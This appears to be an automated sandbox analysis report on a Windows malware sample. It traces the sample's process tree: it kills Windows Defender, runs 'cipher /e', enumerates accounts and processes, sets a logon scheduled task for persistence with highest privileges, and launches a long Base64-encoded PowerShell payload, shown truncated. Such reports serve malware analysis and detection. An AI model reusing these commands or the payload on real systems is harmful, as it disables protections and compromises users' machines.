vir.execmd.execmd.execmd.exenet.exenet.exeiexplore.exedescription pid Process procid_target PID 2544 wrote to memory of 2220 2544 vir.exe 31 PID 2544 wrote to memory of 2220 2544 vir.exe 31 PID 2544 wrote to memory of 2220 2544 vir.exe 31 PID 2544 wrote to memory of 2220 2544 vir.exe 31 PID 2220 wrote to memory of 1576 2220 cmd.exe 33 PID 2220 wrote to memory of 1576 2220 cmd.exe 33 PID 2220 wrote to memory of 1576 2220 cmd.exe 33 PID 2220 wrote to memory of 1576 2220 cmd.exe 33 PID 2220 wrote to memory of 2040 2220 cmd.exe 34 PID 2220 wrote to memory of 2040 2220 cmd.exe 34 PID 2220 wrote to memory of 2040 2220 cmd.exe 34 PID 2220 wrote to memory of 2040 2220 cmd.exe 34 PID 2220 wrote to memory of 1160 2220 cmd.exe 37 PID 2220 wrote to memory of 1160 2220 cmd.exe 37 PID 2220 wrote to memory of 1160 2220 cmd.exe 37 PID 2220 wrote to memory of 1160 2220 cmd.exe 37 PID 2040 wrote to memory of 1720 2040 cmd.exe 38 PID 2040 wrote to memory of 1720 2040 cmd.exe 38 PID 2040 wrote to memory of 1720 2040 cmd.exe 38 PID 2040 wrote to memory of 1720 2040 cmd.exe 38 PID 1576 wrote to memory of 2496 1576 cmd.exe 39 PID 1576 wrote to memory of 2496 1576 cmd.exe 39 PID 1576 wrote to memory of 2496 1576 cmd.exe 39 PID 1576 wrote to memory of 2496 1576 cmd.exe 39 PID 2040 wrote to memory of 1696 2040 cmd.exe 40 PID 2040 wrote to memory of 1696 2040 cmd.exe 40 PID 2040 wrote to memory of 1696 2040 cmd.exe 40 PID 2040 wrote to memory of 1696 2040 cmd.exe 40 PID 1576 wrote to memory of 1364 1576 cmd.exe 41 PID 1576 wrote to memory of 1364 1576 cmd.exe 41 PID 1576 wrote to memory of 1364 1576 cmd.exe 41 PID 1576 wrote to memory of 1364 1576 cmd.exe 41 PID 1696 wrote to memory of 1464 1696 net.exe 42 PID 1696 wrote to memory of 1464 1696 net.exe 42 PID 1696 wrote to memory of 1464 1696 net.exe 42 PID 1696 wrote to memory of 1464 1696 net.exe 42 PID 1576 wrote to memory of 2824 1576 cmd.exe 43 PID 1576 wrote to memory of 2824 1576 cmd.exe 43 PID 1576 wrote to memory of 2824 1576 cmd.exe 43 PID 1576 wrote to memory of 2824 1576 cmd.exe 43 PID 2040 wrote to memory of 2832 2040 cmd.exe 44 PID 2040 wrote to memory of 2832 2040 cmd.exe 44 PID 2040 wrote to memory of 2832 2040 cmd.exe 44 PID 2040 wrote to memory of 2832 2040 cmd.exe 44 PID 2832 wrote to memory of 2404 2832 net.exe 45 PID 2832 wrote to memory of 2404 2832 net.exe 45 PID 2832 wrote to memory of 2404 2832 net.exe 45 PID 2832 wrote to memory of 2404 2832 net.exe 45 PID 2040 wrote to memory of 984 2040 cmd.exe 46 PID 2040 wrote to memory of 984 2040 cmd.exe 46 PID 2040 wrote to memory of 984 2040 cmd.exe 46 PID 2040 wrote to memory of 984 2040 cmd.exe 46 PID 2220 wrote to memory of 2316 2220 cmd.exe 48 PID 2220 wrote to memory of 2316 2220 cmd.exe 48 PID 2220 wrote to memory of 2316 2220 cmd.exe 48 PID 2220 wrote to memory of 2316 2220 cmd.exe 48 PID 2220 wrote to memory of 876 2220 cmd.exe 50 PID 2220 wrote to memory of 876 2220 cmd.exe 50 PID 2220 wrote to memory of 876 2220 cmd.exe 50 PID 2220 wrote to memory of 876 2220 cmd.exe 50 PID 2972 wrote to memory of 2604 2972 iexplore.exe 53 PID 2972 wrote to memory of 2604 2972 iexplore.exe 53 PID 2972 wrote to memory of 2604 2972 iexplore.exe 53 PID 2972 wrote to memory of 2604 2972 iexplore.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
sjhkhda.exedescription ioc Process Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe -
outlook_win_path 1 IoCs
Processes:
sjhkhda.exedescription ioc Process Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\!main.cmd" "2⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:2496
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1364
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- Enumerates system info in registry
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:1720
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵
- System Location Discovery: System Language Discovery
PID:1464
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵
- System Location Discovery: System Language Discovery
PID:2404
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵PID:876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- System Location Discovery: System Language Discovery
PID:2024 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:1136
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:3312
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:2904
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:2948
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\web.htm3⤵
- Manipulates Digital Signatures
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1696 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1696 CREDAT:275457 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1424
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1696 CREDAT:930821 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2380
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1696 CREDAT:603150 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3804
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:2060
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2816
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2760
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:1200
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:2664
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Loads dropped DLL
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2852
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exeC:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3348
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0wOC0xOFQxNDozMjoyMC41ODdaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ5⤵PID:2440
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\bloatware\2.hta"4⤵
- Blocklisted process makes network request
PID:3168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3324 -
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3400 -
C:\Users\Admin\AppData\Local\Temp\is-QBODR.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-QBODR.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10356,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵PID:3640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\regmess.exeregmess.exe3⤵
- Executes dropped EXE
PID:1520 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_e4ef9cba-212f-4a9e-b517-86a6322b9b19\regmess.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:3148 -
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵PID:3360
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:3428
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:3452
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- Modifies Internet Explorer settings
PID:3504
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:3528
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2136
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:3620 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3088
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3128 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3104
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vyQCSGYVUli5.bat" "5⤵PID:3360
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:3428
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3488
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3852 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3684
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\HhgcQCRCrRzX.bat" "7⤵PID:3964
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3996
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3992
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4084 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2484
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\u4GODL9MfCbm.bat" "9⤵PID:3008
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:1904
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1200
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3080 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:2228
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\UbxIoWuprtYH.bat" "11⤵PID:3136
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:3516
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3608
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3756 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:1620
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\OWwArTRDUlJS.bat" "13⤵PID:664
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:2404
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2592
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1672 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:3820
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YjldIde8BDwx.bat" "15⤵PID:3148
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3488
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3480
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3172 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:2884
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\gXzdmP25romt.bat" "17⤵PID:3860
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3432
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:468
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3608 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:3376
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\WVuSycn4lmw7.bat" "19⤵PID:1160
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:4000
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1884
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1640 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:3084
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\0YvyiuaONTlZ.bat" "21⤵PID:3720
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:920
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3768
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:804 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:3676
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\oLbzJNmzW1Ge.bat" "23⤵PID:1588
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:3368
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3020
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3476 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:2560
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\5kHU2bO51mbn.bat" "25⤵PID:2900
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:3880
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2404
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"26⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2592 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:4040
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ElY1aoaFXdkD.bat" "27⤵PID:2876
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:1572
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3980
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"28⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3112 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:3876
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\qyjqVSZlJMeV.bat" "29⤵PID:1092
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:3804
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:936
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\the.exethe.exe3⤵
- Executes dropped EXE
PID:4016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJ